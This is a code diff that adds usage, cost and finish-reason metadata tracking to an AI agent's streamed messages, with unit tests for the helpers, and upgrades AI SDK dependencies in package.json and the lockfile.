RunAgentStepInput = { messages: UIMessage[]; @@ -45,7 +46,7 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe hasSandboxState: Boolean(input.agentContext.sandbox?.state), }); - const modelMessages = convertToModelMessages(input.messages); + const modelMessages = await convertToModelMessages(input.messages); const tools = buildAgentTools({ skills: input.agentContext.skills }); // Construct the model here (not in the workflow input) — LanguageModel // instances aren't JSON-serializable and can't ride durable inputs. @@ -69,7 +70,12 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe // doesn't leak the lock. const writer = input.writable.getWriter(); try { - for await (const part of result.toUIMessageStream()) { + // `messageMetadata` emits {modelId, usage, cost} chunks the UI + // renders as model/cost badges. Mirrors open-agents' chat workflow + // shape so sandbox.recoupable.com sees the same metadata when cut + // over to api's /api/chat/workflow. + const messageMetadata = buildMessageMetadataCallback({ modelId: input.modelId }); + for await (const part of result.toUIMessageStream({ messageMetadata })) { await writer.write(part); } } finally { diff --git a/lib/agent/messageMetadata/AgentMessageMetadata.ts b/lib/agent/messageMetadata/AgentMessageMetadata.ts new file mode 100644 index 000000000..df306c057 --- /dev/null +++ b/lib/agent/messageMetadata/AgentMessageMetadata.ts @@ -0,0 +1,29 @@ +import type { FinishReason, LanguageModelUsage } from "ai"; +import type { AgentStepFinishMetadata } from "@/lib/agent/messageMetadata/AgentStepFinishMetadata"; + +/** + * Metadata emitted on each assistant turn via the `messageMetadata` + * callback in `runAgentStep`. Mirrors open-agents' + * `apps/web/app/types.ts:WebAgentMessageMetadata` byte-for-byte so the + * sandbox.recoupable.com UI can render model/cost/usage badges when + * cut over to api's `/api/chat/workflow`. 
Now that api ships + * `ai@^6.0.190`, `LanguageModelUsage` is the same flat-shape type + * open-agents has been using — no shape conversion needed. + */ +export type AgentMessageMetadata = { + /** Model the client requested (e.g. user selection in the UI). */ + selectedModelId?: string; + /** Model actually used for the call (may differ from selected under gateway fallback). */ + modelId?: string; + /** Usage from the most recent `finish-step`. */ + lastStepUsage?: LanguageModelUsage; + /** Cumulative usage across every step in this message. */ + totalMessageUsage?: LanguageModelUsage; + /** Gateway-reported cost of the most recent step, in USD. */ + lastStepCost?: number; + /** Cumulative gateway-reported cost across every step of the message, in USD. */ + totalMessageCost?: number; + lastStepFinishReason?: FinishReason; + lastStepRawFinishReason?: string; + stepFinishReasons?: AgentStepFinishMetadata[]; +}; diff --git a/lib/agent/messageMetadata/AgentStepFinishMetadata.ts b/lib/agent/messageMetadata/AgentStepFinishMetadata.ts new file mode 100644 index 000000000..4bc618cbd --- /dev/null +++ b/lib/agent/messageMetadata/AgentStepFinishMetadata.ts @@ -0,0 +1,11 @@ +import type { FinishReason } from "ai"; + +/** + * Per-finish-step record kept on the assistant message so the UI can + * render a finish-reason history. Mirrors open-agents' + * `WebAgentStepFinishMetadata` in `apps/web/app/types.ts`. + */ +export type AgentStepFinishMetadata = { + finishReason: FinishReason; + rawFinishReason?: string; +}; diff --git a/lib/agent/messageMetadata/GatewayProviderMetadata.ts b/lib/agent/messageMetadata/GatewayProviderMetadata.ts new file mode 100644 index 000000000..0c10c954a --- /dev/null +++ b/lib/agent/messageMetadata/GatewayProviderMetadata.ts @@ -0,0 +1,18 @@ +/** + * Shape of the Vercel AI Gateway entry in `providerMetadata`. + * Mirrors open-agents' `apps/web/app/workflows/gateway-metadata.ts`. 
+ * + * The gateway surfaces per-step cost information alongside routing + * diagnostics. We only consume the `cost` field; other fields are + * documented for reference and forward-compat. + */ +export interface GatewayProviderMetadata { + gateway: { + cost?: string; + marketCost?: string; + inferenceCost?: string; + inputInferenceCost?: string; + outputInferenceCost?: string; + generationId?: string; + }; +} diff --git a/lib/agent/messageMetadata/__tests__/addLanguageModelUsage.test.ts b/lib/agent/messageMetadata/__tests__/addLanguageModelUsage.test.ts new file mode 100644 index 000000000..4ba0b0234 --- /dev/null +++ b/lib/agent/messageMetadata/__tests__/addLanguageModelUsage.test.ts @@ -0,0 +1,49 @@ +import { describe, it, expect } from "vitest"; +import { addLanguageModelUsage } from "@/lib/agent/messageMetadata/addLanguageModelUsage"; + +describe("addLanguageModelUsage", () => { + it("sums basic input/output/total tokens", () => { + const result = addLanguageModelUsage( + { inputTokens: 100, outputTokens: 50, totalTokens: 150 }, + { inputTokens: 200, outputTokens: 75, totalTokens: 275 }, + ); + expect(result.inputTokens).toBe(300); + expect(result.outputTokens).toBe(125); + expect(result.totalTokens).toBe(425); + }); + + it("sums nested cache token details", () => { + const result = addLanguageModelUsage( + { + inputTokens: 100, + outputTokens: 50, + inputTokenDetails: { cacheReadTokens: 10, cacheWriteTokens: 5, noCacheTokens: 85 }, + } as never, + { + inputTokens: 200, + outputTokens: 75, + inputTokenDetails: { cacheReadTokens: 20, cacheWriteTokens: 15, noCacheTokens: 165 }, + } as never, + ); + expect(result.inputTokenDetails?.cacheReadTokens).toBe(30); + expect(result.inputTokenDetails?.cacheWriteTokens).toBe(20); + expect(result.inputTokenDetails?.noCacheTokens).toBe(250); + }); + + it("returns undefined for fields missing on both inputs", () => { + const result = addLanguageModelUsage( + { inputTokens: 100 } as never, + { inputTokens: 200 } as never, + ); 
+ expect(result.outputTokens).toBeUndefined(); + expect(result.totalTokens).toBeUndefined(); + }); + + it("treats missing field on one side as 0", () => { + const result = addLanguageModelUsage( + { inputTokens: 100, outputTokens: 50 } as never, + { inputTokens: 200 } as never, + ); + expect(result.outputTokens).toBe(50); + }); +}); diff --git a/lib/agent/messageMetadata/__tests__/addTokenCounts.test.ts b/lib/agent/messageMetadata/__tests__/addTokenCounts.test.ts new file mode 100644 index 000000000..b0c449c0c --- /dev/null +++ b/lib/agent/messageMetadata/__tests__/addTokenCounts.test.ts @@ -0,0 +1,27 @@ +import { describe, it, expect } from "vitest"; +import { addTokenCounts } from "@/lib/agent/messageMetadata/addTokenCounts"; + +describe("addTokenCounts", () => { + it("returns undefined when both inputs are undefined", () => { + expect(addTokenCounts(undefined, undefined)).toBeUndefined(); + }); + + it("returns undefined when both inputs are null", () => { + expect(addTokenCounts(null as never, null as never)).toBeUndefined(); + }); + + it("sums two numbers", () => { + expect(addTokenCounts(100, 50)).toBe(150); + }); + + it("treats undefined on one side as 0", () => { + expect(addTokenCounts(100, undefined)).toBe(100); + expect(addTokenCounts(undefined, 50)).toBe(50); + }); + + it("handles zero correctly (not confused with undefined)", () => { + expect(addTokenCounts(0, 50)).toBe(50); + expect(addTokenCounts(0, 0)).toBe(0); + expect(addTokenCounts(0, undefined)).toBe(0); + }); +}); diff --git a/lib/agent/messageMetadata/__tests__/buildMessageMetadataCallback.test.ts b/lib/agent/messageMetadata/__tests__/buildMessageMetadataCallback.test.ts new file mode 100644 index 000000000..7afd14e00 --- /dev/null +++ b/lib/agent/messageMetadata/__tests__/buildMessageMetadataCallback.test.ts @@ -0,0 +1,93 @@ +import { describe, it, expect } from "vitest"; +import { buildMessageMetadataCallback } from "@/lib/agent/messageMetadata/buildMessageMetadataCallback"; + +const MODEL_ID 
= "anthropic/claude-haiku-4.5"; + +// `ai@^6.0.190` uses the flat LanguageModelUsage shape — same as the +// open-agents UI consumes — so the callback passes usage through +// without any shape conversion. +function finishStepPart(opts: { + inputTokens?: number; + outputTokens?: number; + cost?: string; + finishReason?: string; +}) { + const inputTokens = opts.inputTokens ?? 100; + const outputTokens = opts.outputTokens ?? 50; + return { + type: "finish-step", + usage: { + inputTokens, + outputTokens, + totalTokens: inputTokens + outputTokens, + inputTokenDetails: { + noCacheTokens: inputTokens, + cacheReadTokens: undefined, + cacheWriteTokens: undefined, + }, + outputTokenDetails: { + textTokens: outputTokens, + reasoningTokens: undefined, + }, + }, + providerMetadata: opts.cost ? { gateway: { cost: opts.cost } } : undefined, + finishReason: opts.finishReason ?? "tool-calls", + } as never; +} + +describe("buildMessageMetadataCallback", () => { + it("returns undefined for non-finish-step parts (start, text-delta, tool-call, etc.)", () => { + const cb = buildMessageMetadataCallback({ modelId: MODEL_ID }); + expect(cb({ part: { type: "text-delta", delta: "hi" } as never })).toBeUndefined(); + expect(cb({ part: { type: "start" } as never })).toBeUndefined(); + expect(cb({ part: { type: "tool-call", toolName: "bash" } as never })).toBeUndefined(); + }); + + it("emits modelId + selectedModelId + usage on the first finish-step", () => { + const cb = buildMessageMetadataCallback({ modelId: MODEL_ID }); + const meta = cb({ part: finishStepPart({ inputTokens: 100, outputTokens: 50 }) }); + expect(meta).toMatchObject({ + modelId: MODEL_ID, + selectedModelId: MODEL_ID, + lastStepUsage: { inputTokens: 100, outputTokens: 50 }, + totalMessageUsage: { inputTokens: 100, outputTokens: 50 }, + }); + }); + + it("emits cost when the gateway provider metadata includes it", () => { + const cb = buildMessageMetadataCallback({ modelId: MODEL_ID }); + const meta = cb({ part: 
finishStepPart({ cost: "0.025" }) }); + expect(meta).toMatchObject({ lastStepCost: 0.025, totalMessageCost: 0.025 }); + }); + + it("omits cost fields when the gateway did not report one", () => { + const cb = buildMessageMetadataCallback({ modelId: MODEL_ID }); + const meta = cb({ part: finishStepPart({}) }) as Record<string, unknown>; + expect(meta.lastStepCost).toBeUndefined(); + expect(meta.totalMessageCost).toBeUndefined(); + }); + + it("accumulates usage AND cost across multiple finish-step calls", () => { + const cb = buildMessageMetadataCallback({ modelId: MODEL_ID }); + cb({ part: finishStepPart({ inputTokens: 100, outputTokens: 50, cost: "0.01" }) }); + const meta = cb({ + part: finishStepPart({ inputTokens: 200, outputTokens: 75, cost: "0.03" }), + }); + expect(meta).toMatchObject({ + lastStepUsage: { inputTokens: 200, outputTokens: 75 }, + totalMessageUsage: { inputTokens: 300, outputTokens: 125 }, + lastStepCost: 0.03, + totalMessageCost: 0.04, + }); + }); + + it("records lastStepFinishReason and stepFinishReasons history", () => { + const cb = buildMessageMetadataCallback({ modelId: MODEL_ID }); + cb({ part: finishStepPart({ finishReason: "tool-calls" }) }); + const meta = cb({ part: finishStepPart({ finishReason: "stop" }) }); + expect(meta).toMatchObject({ + lastStepFinishReason: "stop", + stepFinishReasons: [{ finishReason: "tool-calls" }, { finishReason: "stop" }], + }); + }); +}); diff --git a/lib/agent/messageMetadata/__tests__/extractGatewayCost.test.ts b/lib/agent/messageMetadata/__tests__/extractGatewayCost.test.ts new file mode 100644 index 000000000..d1c678914 --- /dev/null +++ b/lib/agent/messageMetadata/__tests__/extractGatewayCost.test.ts @@ -0,0 +1,28 @@ +import { describe, it, expect } from "vitest"; +import { extractGatewayCost } from "@/lib/agent/messageMetadata/extractGatewayCost"; + +describe("extractGatewayCost", () => { + it("returns undefined when providerMetadata is missing", () => { + expect(extractGatewayCost(undefined)).toBeUndefined(); + });
+ + it("returns undefined when there is no `gateway` namespace", () => { + expect(extractGatewayCost({ openai: { foo: "bar" } } as never)).toBeUndefined(); + }); + + it("returns undefined when `gateway.cost` is missing", () => { + expect(extractGatewayCost({ gateway: {} } as never)).toBeUndefined(); + }); + + it("parses a numeric string cost", () => { + expect(extractGatewayCost({ gateway: { cost: "0.0420" } } as never)).toBe(0.042); + }); + + it("returns undefined when cost is non-numeric", () => { + expect(extractGatewayCost({ gateway: { cost: "not-a-number" } } as never)).toBeUndefined(); + }); + + it("returns undefined when cost is a number (gateway should send strings)", () => { + expect(extractGatewayCost({ gateway: { cost: 0.05 } } as never)).toBeUndefined(); + }); +}); diff --git a/lib/agent/messageMetadata/__tests__/hasGatewayShape.test.ts b/lib/agent/messageMetadata/__tests__/hasGatewayShape.test.ts new file mode 100644 index 000000000..c2c24f64f --- /dev/null +++ b/lib/agent/messageMetadata/__tests__/hasGatewayShape.test.ts @@ -0,0 +1,25 @@ +import { describe, it, expect } from "vitest"; +import { hasGatewayShape } from "@/lib/agent/messageMetadata/hasGatewayShape"; + +describe("hasGatewayShape", () => { + it("returns false for undefined metadata", () => { + expect(hasGatewayShape(undefined)).toBe(false); + }); + + it("returns false when there is no `gateway` namespace", () => { + expect(hasGatewayShape({ openai: { foo: "bar" } } as never)).toBe(false); + }); + + it("returns false when `gateway` is null", () => { + expect(hasGatewayShape({ gateway: null } as never)).toBe(false); + }); + + it("returns false when `gateway` is a string (not an object)", () => { + expect(hasGatewayShape({ gateway: "oops" } as never)).toBe(false); + }); + + it("returns true when `gateway` is an object (even empty)", () => { + expect(hasGatewayShape({ gateway: {} } as never)).toBe(true); + expect(hasGatewayShape({ gateway: { cost: "0.05" } } as never)).toBe(true); + }); +}); 
diff --git a/lib/agent/messageMetadata/addLanguageModelUsage.ts b/lib/agent/messageMetadata/addLanguageModelUsage.ts new file mode 100644 index 000000000..4a676364f --- /dev/null +++ b/lib/agent/messageMetadata/addLanguageModelUsage.ts @@ -0,0 +1,49 @@ +import type { LanguageModelUsage } from "ai"; +import { addTokenCounts } from "@/lib/agent/messageMetadata/addTokenCounts"; + +/** + * Pointwise-sum two `LanguageModelUsage` records (the flat shape used by + * `ai@^6.0.190`). Mirrors `packages/agent/usage.ts:addLanguageModelUsage` + * in the open-agents source. Used to accumulate per-step usage into a + * per-message total inside the `messageMetadata` callback. + * + * Returns `undefined` for fields that are missing on BOTH inputs, so + * the resulting usage object stays sparse rather than introducing + * spurious zeros. + */ +export function addLanguageModelUsage( + a: LanguageModelUsage, + b: LanguageModelUsage, +): LanguageModelUsage { + return { + inputTokens: addTokenCounts(a.inputTokens, b.inputTokens), + inputTokenDetails: { + noCacheTokens: addTokenCounts( + a.inputTokenDetails?.noCacheTokens, + b.inputTokenDetails?.noCacheTokens, + ), + cacheReadTokens: addTokenCounts( + a.inputTokenDetails?.cacheReadTokens, + b.inputTokenDetails?.cacheReadTokens, + ), + cacheWriteTokens: addTokenCounts( + a.inputTokenDetails?.cacheWriteTokens, + b.inputTokenDetails?.cacheWriteTokens, + ), + }, + outputTokens: addTokenCounts(a.outputTokens, b.outputTokens), + outputTokenDetails: { + textTokens: addTokenCounts( + a.outputTokenDetails?.textTokens, + b.outputTokenDetails?.textTokens, + ), + reasoningTokens: addTokenCounts( + a.outputTokenDetails?.reasoningTokens, + b.outputTokenDetails?.reasoningTokens, + ), + }, + totalTokens: addTokenCounts(a.totalTokens, b.totalTokens), + reasoningTokens: addTokenCounts(a.reasoningTokens, b.reasoningTokens), + cachedInputTokens: addTokenCounts(a.cachedInputTokens, b.cachedInputTokens), + }; +} diff --git 
a/lib/agent/messageMetadata/addTokenCounts.ts b/lib/agent/messageMetadata/addTokenCounts.ts new file mode 100644 index 000000000..354a79f32 --- /dev/null +++ b/lib/agent/messageMetadata/addTokenCounts.ts @@ -0,0 +1,13 @@ +/** + * Pointwise-sum two `number | undefined` token counts. Returns + * `undefined` only when BOTH inputs are missing — so sparse usage + * records (where the provider only reported some fields) stay sparse + * after summation instead of introducing spurious zeros. + * + * Mirrors open-agents' internal `addTokenCounts` helper inside + * `packages/agent/usage.ts`. + */ +export function addTokenCounts(a: number | undefined, b: number | undefined): number | undefined { + if (a == null && b == null) return undefined; + return (a ?? 0) + (b ?? 0); +} diff --git a/lib/agent/messageMetadata/buildMessageMetadataCallback.ts b/lib/agent/messageMetadata/buildMessageMetadataCallback.ts new file mode 100644 index 000000000..07225fd6a --- /dev/null +++ b/lib/agent/messageMetadata/buildMessageMetadataCallback.ts @@ -0,0 +1,81 @@ +import type { LanguageModelUsage, TextStreamPart, ToolSet } from "ai"; +import { addLanguageModelUsage } from "@/lib/agent/messageMetadata/addLanguageModelUsage"; +import { extractGatewayCost } from "@/lib/agent/messageMetadata/extractGatewayCost"; +import type { AgentMessageMetadata } from "@/lib/agent/messageMetadata/AgentMessageMetadata"; +import type { AgentStepFinishMetadata } from "@/lib/agent/messageMetadata/AgentStepFinishMetadata"; + +/** + * Build a stateful `messageMetadata` callback for `toUIMessageStream`. + * Accumulates per-step usage + cost across an assistant turn and emits + * the running totals on every `finish-step` part. Non-finish parts + * return `undefined` (AI SDK skips emission). + * + * Mirrors open-agents' `apps/web/app/workflows/chat.ts` callback shape + * so sandbox.recoupable.com's UI can render model/cost/usage badges + * when cut over to api's `/api/chat/workflow`. 
api and open-agents now + * share the same `ai@^6.0.190` shape for `LanguageModelUsage`, so no + * shape conversion happens here. + * + * Each call to `buildMessageMetadataCallback` returns a FRESH closure — + * one per assistant turn — so totals reset between turns. + */ +export function buildMessageMetadataCallback(opts: { modelId: string }) { + let lastStepUsage: LanguageModelUsage | undefined; + let totalMessageUsage: LanguageModelUsage | undefined; + let lastStepCost: number | undefined; + let totalMessageCost: number | undefined; + let stepFinishReasons: AgentStepFinishMetadata[] = []; + + return function messageMetadata({ + part, + }: { + part: TextStreamPart; + }): AgentMessageMetadata | undefined { + if (part.type !== "finish-step") return undefined; + + const finishPart = part as TextStreamPart & { + usage?: LanguageModelUsage; + providerMetadata?: Parameters[0]; + finishReason?: AgentStepFinishMetadata["finishReason"]; + rawFinishReason?: string; + }; + + if (finishPart.usage) { + lastStepUsage = finishPart.usage; + totalMessageUsage = totalMessageUsage + ? addLanguageModelUsage(totalMessageUsage, finishPart.usage) + : finishPart.usage; + } + + const stepCost = extractGatewayCost(finishPart.providerMetadata); + if (stepCost !== undefined) { + lastStepCost = stepCost; + totalMessageCost = (totalMessageCost ?? 0) + stepCost; + } + + if (finishPart.finishReason) { + stepFinishReasons = [ + ...stepFinishReasons, + { + finishReason: finishPart.finishReason, + rawFinishReason: finishPart.rawFinishReason, + }, + ]; + } + + return { + // `selectedModelId` and `modelId` are equal in api today (no + // gateway fallback routing exposed) — emit both for shape + // parity with open-agents' WebAgentMessageMetadata. 
+ selectedModelId: opts.modelId, + modelId: opts.modelId, + lastStepUsage, + totalMessageUsage, + lastStepCost, + totalMessageCost, + lastStepFinishReason: finishPart.finishReason, + lastStepRawFinishReason: finishPart.rawFinishReason, + stepFinishReasons, + }; + }; +} diff --git a/lib/agent/messageMetadata/extractGatewayCost.ts b/lib/agent/messageMetadata/extractGatewayCost.ts new file mode 100644 index 000000000..42ef13f63 --- /dev/null +++ b/lib/agent/messageMetadata/extractGatewayCost.ts @@ -0,0 +1,20 @@ +import type { ProviderMetadata } from "ai"; +import { hasGatewayShape } from "@/lib/agent/messageMetadata/hasGatewayShape"; + +/** + * Extract the gateway-reported cost for a single step. + * Returns `undefined` when the step did not go through the gateway, + * the gateway did not attach a cost (e.g. direct provider call), or + * the cost is malformed. + * + * Mirrors open-agents' `apps/web/app/workflows/gateway-metadata.ts`. + */ +export function extractGatewayCost( + providerMetadata: ProviderMetadata | undefined, +): number | undefined { + if (!hasGatewayShape(providerMetadata)) return undefined; + const rawCost = providerMetadata.gateway.cost; + if (typeof rawCost !== "string") return undefined; + const cost = Number.parseFloat(rawCost); + return Number.isFinite(cost) ? cost : undefined; +} diff --git a/lib/agent/messageMetadata/hasGatewayShape.ts b/lib/agent/messageMetadata/hasGatewayShape.ts new file mode 100644 index 000000000..db322c8e7 --- /dev/null +++ b/lib/agent/messageMetadata/hasGatewayShape.ts @@ -0,0 +1,18 @@ +import type { ProviderMetadata } from "ai"; +import type { GatewayProviderMetadata } from "@/lib/agent/messageMetadata/GatewayProviderMetadata"; + +/** + * Type guard for the Vercel AI Gateway entry inside a step's + * `providerMetadata`. Returns true when the metadata has a non-null + * `gateway` object (cost may still be absent). 
Splitting this out from + * `extractGatewayCost` keeps each file to a single responsibility and + * makes the guard reusable when other gateway fields (e.g. + * `inferenceCost`) get plumbed through later. + */ +export function hasGatewayShape( + metadata: ProviderMetadata | undefined, +): metadata is ProviderMetadata & GatewayProviderMetadata { + if (!metadata) return false; + const gateway = (metadata as Record).gateway; + return typeof gateway === "object" && gateway !== null; +} diff --git a/lib/chat/setupChatRequest.ts b/lib/chat/setupChatRequest.ts index f88654de3..949ca29cb 100644 --- a/lib/chat/setupChatRequest.ts +++ b/lib/chat/setupChatRequest.ts @@ -18,10 +18,12 @@ import getGeneralAgent from "@/lib/agents/generalAgent/getGeneralAgent"; export async function setupChatRequest(body: ChatRequestBody): Promise { const decision = await getGeneralAgent(body); - const convertedMessages = convertToModelMessages(body.messages, { - tools: decision.agent.tools, - ignoreIncompleteToolCalls: true, - }).slice(-MAX_MESSAGES); + const convertedMessages = ( + await convertToModelMessages(body.messages, { + tools: decision.agent.tools, + ignoreIncompleteToolCalls: true, + }) + ).slice(-MAX_MESSAGES); return { agent: decision.agent, diff --git a/package.json b/package.json index 4b5a23bc0..f2d1ba03a 100644 --- a/package.json +++ b/package.json @@ -17,11 +17,11 @@ "eval": "braintrust eval --external-packages playwright playwright-core chromium-bidi @browserbasehq/stagehand @composio/core @composio/vercel" }, "dependencies": { - "@ai-sdk/anthropic": "^3.0.13", - "@ai-sdk/gateway": "2.0.83", - "@ai-sdk/google": "^3.0.8", - "@ai-sdk/mcp": "^0.0.12", - "@ai-sdk/openai": "^3.0.10", + "@ai-sdk/anthropic": "^3.0.78", + "@ai-sdk/gateway": "3.0.119", + "@ai-sdk/google": "^3.0.79", + "@ai-sdk/mcp": "^1.0.43", + "@ai-sdk/openai": "^3.0.65", "@chat-adapter/github": "^4.15.0", "@chat-adapter/slack": "^4.15.0", "@chat-adapter/state-ioredis": "^4.15.0", @@ -37,7 +37,7 @@ 
"@trigger.dev/sdk": "^4.4.3", "@vercel/blob": "^2.3.1", "@vercel/sandbox": "2.0.0-beta.11", - "ai": "6.0.0-beta.122", + "ai": "6.0.190", "apify-client": "^2.20.0", "arweave": "^1.15.7", "autoevals": "^0.0.129", diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml index eee3c93c9..7b4a331ad 100644 --- a/pnpm-lock.yaml +++ b/pnpm-lock.yaml @@ -9,20 +9,20 @@ importers: .: dependencies: '@ai-sdk/anthropic': - specifier: ^3.0.13 - version: 3.0.13(zod@4.1.13) + specifier: ^3.0.78 + version: 3.0.78(zod@4.1.13) '@ai-sdk/gateway': - specifier: 2.0.83 - version: 2.0.83(zod@4.1.13) + specifier: 3.0.119 + version: 3.0.119(zod@4.1.13) '@ai-sdk/google': - specifier: ^3.0.8 - version: 3.0.8(zod@4.1.13) + specifier: ^3.0.79 + version: 3.0.79(zod@4.1.13) '@ai-sdk/mcp': - specifier: ^0.0.12 - version: 0.0.12(zod@4.1.13) + specifier: ^1.0.43 + version: 1.0.43(zod@4.1.13) '@ai-sdk/openai': - specifier: ^3.0.10 - version: 3.0.10(zod@4.1.13) + specifier: ^3.0.65 + version: 3.0.65(zod@4.1.13) '@chat-adapter/github': specifier: ^4.15.0 version: 4.15.0 @@ -46,7 +46,7 @@ importers: version: 0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13) '@composio/vercel': specifier: ^0.3.4 - version: 0.3.4(@composio/core@0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13))(ai@6.0.0-beta.122(zod@4.1.13)) + version: 0.3.4(@composio/core@0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13))(ai@6.0.190(zod@4.1.13)) '@fal-ai/client': specifier: ^1.9.5 version: 1.9.5 @@ -61,7 +61,7 @@ importers: version: 2.86.0(bufferutil@4.0.9)(utf-8-validate@5.0.10) '@trigger.dev/sdk': specifier: ^4.4.3 - version: 4.4.3(ai@6.0.0-beta.122(zod@4.1.13))(bufferutil@4.0.9)(utf-8-validate@5.0.10)(zod@4.1.13) + version: 4.4.3(ai@6.0.190(zod@4.1.13))(bufferutil@4.0.9)(utf-8-validate@5.0.10)(zod@4.1.13) '@vercel/blob': specifier: ^2.3.1 version: 2.3.1 @@ -69,8 +69,8 @@ importers: specifier: 2.0.0-beta.11 version: 2.0.0-beta.11 ai: - specifier: 6.0.0-beta.122 - version: 
6.0.0-beta.122(zod@4.1.13) + specifier: 6.0.190 + version: 6.0.190(zod@4.1.13) apify-client: specifier: ^2.20.0 version: 2.20.0 @@ -204,72 +204,38 @@ packages: '@adraffy/ens-normalize@1.11.1': resolution: {integrity: sha512-nhCBV3quEgesuf7c7KYfperqSS14T8bYuvJ8PcLJp6znkZpFc0AuW4qBtr8eKVyPPe/8RSr7sglCWPU5eaxwKQ==} - '@ai-sdk/anthropic@3.0.13': - resolution: {integrity: sha512-62UqSpZWuR8pU2ZLc1IgPYiNdH01blAcaNEjrQtx4wCN7L2fUTXm/iG6Tq9qRCiRED+8eQ43olggbf0fbguqkA==} + '@ai-sdk/anthropic@3.0.78': + resolution: {integrity: sha512-0OY12G20cUt6iU6htpEA1491Oz++NVxZxlmWGX4B7rSbeZ5pnDmOu6YtW9BKzdZlNx5Gn23i6WMxyZFoMKNcgA==} engines: {node: '>=18'} peerDependencies: zod: ^3.25.76 || ^4.1.8 - '@ai-sdk/gateway@2.0.0-beta.66': - resolution: {integrity: sha512-9H4Y4pFcTlDqLOjhJNfHVJrmQiGGqzQLIDNKSGhab90KYgeZc7NouQF752jUIlEZCY1S4QynuUKISTUsKR6Qjg==} + '@ai-sdk/gateway@3.0.119': + resolution: {integrity: sha512-VAhfRWC+JexZakkVfmjaJKaTj00x7/UHdE8kMWL3NhuQAlf8oXtg9r4dfvFZrByXxchGRBvYE3biEUyibkg0xg==} engines: {node: '>=18'} peerDependencies: zod: ^3.25.76 || ^4.1.8 - '@ai-sdk/gateway@2.0.83': - resolution: {integrity: sha512-qgxu2++9tJTPZtC+VGczu21YNXTtzfrLQunqh7xcCaWSogAluchrGiKFS3IZkX7Se9dEt1yYZ6+d+cGo4cko6Q==} + '@ai-sdk/google@3.0.79': + resolution: {integrity: sha512-QWVAvYeA7JzEX2wkSyXOWv/I9PD9kvTzdykkSTLi+Eu8RyJ6gA0tdPIGa8esEtOcHE//G5vy6FTB70qQw8l/uw==} engines: {node: '>=18'} peerDependencies: zod: ^3.25.76 || ^4.1.8 - '@ai-sdk/google@3.0.8': - resolution: {integrity: sha512-HiDetkn01f8ibcu6atygkPXsy6YgNA2uNz2bwgn6xHQQB1FsCCjDo8ylPA2EvaUbNypmD7oPj0zObDgwfE25Ug==} + '@ai-sdk/mcp@1.0.43': + resolution: {integrity: sha512-HdDMeyCcfIn5tW/P1kJ+BmYP8vfY8vppRn7swbVNRcLeFz/cpwik+B+C49Up4u5scRAcATtRJywOa7/rA4BmIA==} engines: {node: '>=18'} peerDependencies: zod: ^3.25.76 || ^4.1.8 - '@ai-sdk/mcp@0.0.12': - resolution: {integrity: sha512-hyf31U2CmgGexqOLgLfno525pjbqidJLu9pU+XcEwW/PkMcfTFuRq1iD3wbqtAmURRW0qJITiKV+in1B4I23gA==} + '@ai-sdk/openai@3.0.65': + resolution: {integrity: 
sha512-ZlVoWH+zrdiYDiUt6n/xvfCsk33mzsB81TUQkBRVx79rxU1FKZqVH9J/QCtEpSLqx0cUzjvtIw9l9p7EbUv+dw==} engines: {node: '>=18'} peerDependencies: zod: ^3.25.76 || ^4.1.8 - '@ai-sdk/openai@3.0.10': - resolution: {integrity: sha512-G6HJORN0rKuCFrqIUiYchjl2b4UjzKvv3VcNuW7xwQIdI8EcdB9Pr8ZaR9nEImK9E639nM8gCfvFEUM1xwGaCA==} - engines: {node: '>=18'} - peerDependencies: - zod: ^3.25.76 || ^4.1.8 - - '@ai-sdk/provider-utils@3.0.19': - resolution: {integrity: sha512-W41Wc9/jbUVXVwCN/7bWa4IKe8MtxO3EyA0Hfhx6grnmiYlCvpI8neSYWFE0zScXJkgA/YK3BRybzgyiXuu6JA==} - engines: {node: '>=18'} - peerDependencies: - zod: ^3.25.76 || ^4.1.8 - - '@ai-sdk/provider-utils@3.0.24': - resolution: {integrity: sha512-Zq6olgYvpMgfstQNpDwgqDC2wBEE+OnMnMuq4JyIu+aWjL8JJl+6u1sbKJNPxASErWrRlmOPIkat2fHiN4puhA==} - engines: {node: '>=18'} - peerDependencies: - zod: ^3.25.76 || ^4.1.8 - - '@ai-sdk/provider-utils@4.0.0-beta.38': - resolution: {integrity: sha512-m1klVKT8KntgEIxHnSGEzdhdn48Uf/w6fe5rPWGnpTd+P532mADV7BC4txNYp40ziS5Z9VV1g1wn2xRScwEeRw==} - engines: {node: '>=18'} - peerDependencies: - '@valibot/to-json-schema': ^1.3.0 - arktype: ^2.1.22 - effect: ^3.18.4 - zod: ^3.25.76 || ^4.1.8 - peerDependenciesMeta: - '@valibot/to-json-schema': - optional: true - arktype: - optional: true - effect: - optional: true - - '@ai-sdk/provider-utils@4.0.6': - resolution: {integrity: sha512-o/SP1GQOrpXAzHjMosPHI0Pu+YkwxIMndSjSLrEXtcVixdrjqrGaA9I7xJcWf+XpRFJ9byPHrKYnprwS+36gMg==} + '@ai-sdk/provider-utils@4.0.27': + resolution: {integrity: sha512-ubkAJ+xODouwtmN1tYlvTPphH1hPOBfZaEQe8U7skGvFAnIRs9PPpsq57bC2+Ky/MB4yzhd6YOsxTAx9sGpazw==} engines: {node: '>=18'} peerDependencies: zod: ^3.25.76 || ^4.1.8 @@ -278,20 +244,8 @@ packages: resolution: {integrity: sha512-qZMxYJ0qqX/RfnuIaab+zp8UAeJn/ygXXAffR5I4N0n1IrvA6qBsjc8hXLmBiMV2zoXlifkacF7sEFnYnjBcqg==} engines: {node: '>=18'} - '@ai-sdk/provider@2.0.0': - resolution: {integrity: sha512-6o7Y2SeO9vFKB8lArHXehNuusnpddKPk7xqL7T2/b+OvXMRIXUO1rR4wcv1hAFUAT9avGZshty3Wlua/XA7TvA==} - 
